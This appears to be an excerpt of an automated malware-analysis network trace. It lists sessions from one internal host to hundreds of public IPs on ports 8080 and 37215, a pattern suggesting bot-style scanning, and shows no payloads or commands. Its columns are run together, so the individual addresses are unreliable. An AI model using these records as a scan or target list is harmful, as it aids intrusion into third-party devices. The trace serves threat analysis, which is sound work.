                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8376192.168.2.235346223.48.124.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8377192.168.2.233640814.56.187.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8378192.168.2.234324489.220.179.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8379192.168.2.2335602202.177.201.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8380192.168.2.234814690.235.130.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8381192.168.2.2345604183.179.224.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8382192.168.2.235741618.103.223.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8383192.168.2.234492887.53.191.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8384192.168.2.2345174188.14.64.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8385192.168.2.235518860.39.184.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8386192.168.2.2345558199.54.45.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8387192.168.2.235469699.9.85.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8388192.168.2.233314845.132.188.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8389192.168.2.2335640126.161.188.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8390192.168.2.2354830212.99.17.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8391192.168.2.233789813.154.24.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8392192.168.2.2336274195.74.173.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8393192.168.2.2360886191.143.238.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8394192.168.2.2349974103.48.205.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8395192.168.2.2336186138.42.113.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8396192.168.2.23527801.173.66.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8397192.168.2.235803627.115.38.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8398192.168.2.2334504221.16.11.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8399192.168.2.2351788128.4.29.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8400192.168.2.2347714177.56.188.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8401192.168.2.2336064208.234.116.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8402192.168.2.2360808160.143.205.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8403192.168.2.2357666201.150.241.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8404192.168.2.2356996174.1.85.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8405192.168.2.2345000150.83.163.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8406192.168.2.235367890.82.146.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8407192.168.2.235102465.43.151.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8408192.168.2.234055671.241.169.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8409192.168.2.234469892.146.161.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8410192.168.2.234352617.214.27.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8411192.168.2.233418269.120.65.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8412192.168.2.2352588116.160.119.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8413192.168.2.2357528195.132.80.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8414192.168.2.2349480101.81.242.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8415192.168.2.2360310124.9.117.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8416192.168.2.2352778140.175.170.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8417192.168.2.235799651.186.226.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8418192.168.2.2341334101.191.114.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8419192.168.2.2350598223.2.91.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8420192.168.2.234076288.101.138.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8421192.168.2.2335952194.101.76.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8422192.168.2.234154696.201.207.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8423192.168.2.234540235.142.254.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8424192.168.2.2355844152.238.174.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8425192.168.2.2358080131.225.238.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8426192.168.2.2335032148.248.13.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8427192.168.2.2346076138.210.143.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8428192.168.2.2348450131.152.202.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8429192.168.2.233379241.39.199.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8430192.168.2.233948077.216.20.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8431192.168.2.235296441.191.17.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8432192.168.2.234041841.42.71.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8433192.168.2.235728441.228.71.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8434192.168.2.235946441.167.31.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8435192.168.2.233809441.225.54.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8436192.168.2.2340080157.165.170.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8437192.168.2.234685041.94.244.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8438192.168.2.233924041.189.30.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8439192.168.2.233939834.167.190.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8440192.168.2.2340512197.211.139.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8441192.168.2.2332840117.241.96.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8442192.168.2.2335040157.87.10.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8443192.168.2.2356376197.164.85.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8444192.168.2.234053452.158.42.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8445192.168.2.2337266197.129.236.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8446192.168.2.2336840197.134.228.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8447192.168.2.2347104148.52.189.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8448192.168.2.235957675.221.89.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8449192.168.2.233781041.60.57.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8450192.168.2.2342248197.12.166.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8451192.168.2.234843675.168.162.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8452192.168.2.2358784157.126.79.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8453192.168.2.2343256221.184.31.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8454192.168.2.2346722208.176.180.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8455192.168.2.2348722157.136.42.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8456192.168.2.2342270197.149.126.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8457192.168.2.233913641.195.30.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8458192.168.2.2334214157.4.92.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8459192.168.2.234331841.164.42.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8460192.168.2.233282676.29.171.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8461192.168.2.2356600197.228.53.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8462192.168.2.2349206135.61.164.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8463192.168.2.2353784157.254.44.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8464192.168.2.2357386197.124.168.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8465192.168.2.2339488197.98.151.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8466192.168.2.234941641.47.100.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8467192.168.2.2357826184.9.31.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8468192.168.2.2342906197.73.175.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8469192.168.2.2333504201.135.120.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8470192.168.2.2346384133.150.51.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8471192.168.2.235757041.164.165.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8472192.168.2.235789460.136.124.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8473192.168.2.2358780192.189.61.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8474192.168.2.236028441.136.59.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8475192.168.2.2339374157.204.76.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8476192.168.2.234065641.251.169.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8477192.168.2.2344228197.84.24.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8478192.168.2.235384041.29.77.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8479192.168.2.2340716157.163.56.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8480192.168.2.2339318197.246.228.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8481192.168.2.2348402117.81.159.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8482192.168.2.2352404157.96.221.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8483192.168.2.2359500197.120.44.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8484192.168.2.235392023.44.213.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8485192.168.2.233909020.8.218.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8486192.168.2.235567041.126.211.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8487192.168.2.235729053.105.243.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8488192.168.2.235732841.97.254.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8489192.168.2.2349882178.215.233.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8490192.168.2.2333810167.247.106.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8491192.168.2.2359660157.195.11.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8492192.168.2.2357474197.244.37.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8493192.168.2.2332768157.172.73.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8494192.168.2.233805441.159.115.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8495192.168.2.233290641.7.71.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8496192.168.2.2343690111.233.220.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8497192.168.2.2337744197.205.202.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8498192.168.2.234923841.221.86.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8499192.168.2.234558041.40.124.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8500192.168.2.2359996197.231.31.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8501192.168.2.2347856197.247.78.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8502192.168.2.2344636176.146.245.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8503192.168.2.2340632197.187.91.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8504192.168.2.2350248157.155.230.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8505192.168.2.2343708197.232.194.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8506192.168.2.2359096102.231.233.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8507192.168.2.2333760157.223.71.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8508192.168.2.233278841.117.10.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8509192.168.2.2357158197.174.66.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8510192.168.2.2350630197.102.105.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8511192.168.2.23378889.214.200.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8512192.168.2.2348878157.162.163.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8513192.168.2.233575641.154.173.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8514192.168.2.2334080157.166.34.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8515192.168.2.2340584157.21.176.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8516192.168.2.235060241.145.120.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8517192.168.2.2350462197.188.239.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8518192.168.2.2347992157.164.175.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8519192.168.2.2334146157.223.138.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8520192.168.2.2338108157.30.255.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8521192.168.2.2351038111.242.21.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8522192.168.2.235149641.198.193.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8523192.168.2.2356088197.241.36.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8524192.168.2.2336154197.246.183.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8525192.168.2.234859041.16.105.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8526192.168.2.2339976183.163.115.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8527192.168.2.2353542157.64.204.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8528192.168.2.2333940157.94.229.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8529192.168.2.2355540197.12.235.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8530192.168.2.2336060157.203.191.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8531192.168.2.2356100157.62.198.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8532192.168.2.2335256157.6.48.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8533192.168.2.2338622197.105.17.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8534192.168.2.235602041.138.162.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8535192.168.2.234984441.86.3.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8536192.168.2.2359576197.62.82.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8537192.168.2.2343368218.27.116.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8538192.168.2.2337498197.76.156.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8539192.168.2.2334308191.184.195.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8540192.168.2.2357586169.134.4.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8541192.168.2.2354734197.237.21.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8542192.168.2.235806241.33.252.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8543192.168.2.2348010197.99.106.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8544192.168.2.235285841.137.39.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8545192.168.2.2335118157.56.201.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8546192.168.2.235092441.247.80.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8547192.168.2.2335732197.44.175.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8548192.168.2.2337358157.159.86.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8549192.168.2.2358168157.158.144.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8550192.168.2.235822613.232.114.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8551192.168.2.235106041.137.126.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8552192.168.2.233659241.168.141.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8553192.168.2.2339846197.160.193.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8554192.168.2.2333054197.22.243.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8555192.168.2.234766241.86.6.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8556192.168.2.235730241.232.108.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8557192.168.2.233890641.3.145.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8558192.168.2.2336750197.92.10.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8559192.168.2.2338878197.32.178.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8560192.168.2.2358800172.107.196.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8561192.168.2.2340506197.185.114.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8562192.168.2.2348784197.100.41.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8563192.168.2.2340984197.152.106.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8564192.168.2.2334176157.168.223.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8565192.168.2.235367041.14.58.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8566192.168.2.2360778157.145.196.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8567192.168.2.2338846157.149.126.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8568192.168.2.2341212138.135.60.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8569192.168.2.2356058157.155.68.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8570192.168.2.233497890.9.122.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8571192.168.2.233783441.172.171.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8572192.168.2.234402441.181.159.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8573192.168.2.2345870197.12.56.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8574192.168.2.2357042197.120.183.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8575192.168.2.2355848103.34.179.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8576192.168.2.2354752166.244.156.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8577192.168.2.2354704157.107.170.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8578192.168.2.2351104197.214.100.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8579192.168.2.234328041.112.227.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8580192.168.2.2342714197.45.116.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8581192.168.2.2347484159.23.19.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8582192.168.2.2340178161.34.187.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8583192.168.2.2345148216.81.149.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8584192.168.2.234399243.70.162.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8585192.168.2.2355038194.82.135.2058080
